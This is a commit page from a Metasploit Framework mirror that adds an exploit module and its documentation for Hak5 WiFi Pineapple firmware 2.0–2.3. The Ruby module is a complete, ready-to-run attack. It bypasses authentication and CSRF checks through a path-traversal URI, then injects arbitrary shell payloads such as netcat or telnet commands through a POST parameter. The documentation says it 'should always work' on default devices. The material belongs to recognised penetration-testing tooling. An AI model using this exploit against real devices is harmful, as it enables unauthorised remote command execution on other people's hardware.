infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #7285, WiFi pineapple command injection via authentication bypass

bug/bundler_fix
Brent Cook 2016-10-14 12:57:05 -05:00
parent 9111d8598c d36940260f
commit e05a325786
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 128 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
documentation/modules/exploit/linux/http/pineapple_bypass_cmdinject.md Normal file
View File

@ -0,0 +1,21 @@
## Background
The 'pineapple_bypass_cmdinject' exploit attacks a weak check for
pre-authorized files (CSS files) which allows the attacker to bypass logging in
at all and then relies on the anti-CSRF vulnerability (CVE-2015-4624) to obtain
command injection.
This exploit uses a utility function in
/components/system/configuration/functions.php to execute commands once
authorization has been bypassed.
## Verification
This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
default options are generally effective due to having a set state after being
flashed. You will need to be connected to the WiFi pineapple network (e.g. via
WiFi or ethernet).
Assuming the above 2.3 firmware is installed, this exploit should always work.
If it does not, try it again. It should always work as long as the pineapple is
in its default configuration.

107
modules/exploits/linux/http/pineapple_bypass_cmdinject.rb Normal file
View File

@ -0,0 +1,107 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
'Description' => %q{
This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
Provided as part of the TospoVirus workshop at DEFCON23.
},
'Author' => ['catatonicprime'],
'License' => MSF_LICENSE,
'References' => [ ],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python netcat telnet'
}
},
'Targets' =>
[
[ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 1 2015'))
register_options(
[
OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
Opt::RPORT(1471),
Opt::RHOST('172.16.42.1')
]
)
deregister_options(
'ContextInformationFile',
'DOMAIN',
'DigestAuthIIS',
'EnableContextEncoding',
'FingerprintCheck',
'HttpClientTimeout',
'NTLM::SendLM',
'NTLM::SendNTLM',
'NTLM::SendSPN',
'NTLM::UseLMKey',
'NTLM::UseNTLM2_session',
'NTLM::UseNTLMv2',
'SSL',
'SSLVersion',
'VERBOSE',
'WORKSPACE',
'WfsDelay',
'Proxies',
'VHOST'
)
end
def cmd_uri
normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
end
def cmd_inject(cmd)
res = send_request_cgi(
'method' => 'POST',
'uri' => cmd_uri,
'vars_get' => {
'execute' => "" # Presence triggers command execution
},
'vars_post' => {
'commands' => cmd
})
res
end
def check
res = cmd_inject("echo")
if res && res.code == 200 && res.body =~ /Executing/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status('Attempting to bypass login/csrf checks...')
unless check
fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
end
print_status('Executing payload...')
cmd_inject("#{payload.encoded}")
end
end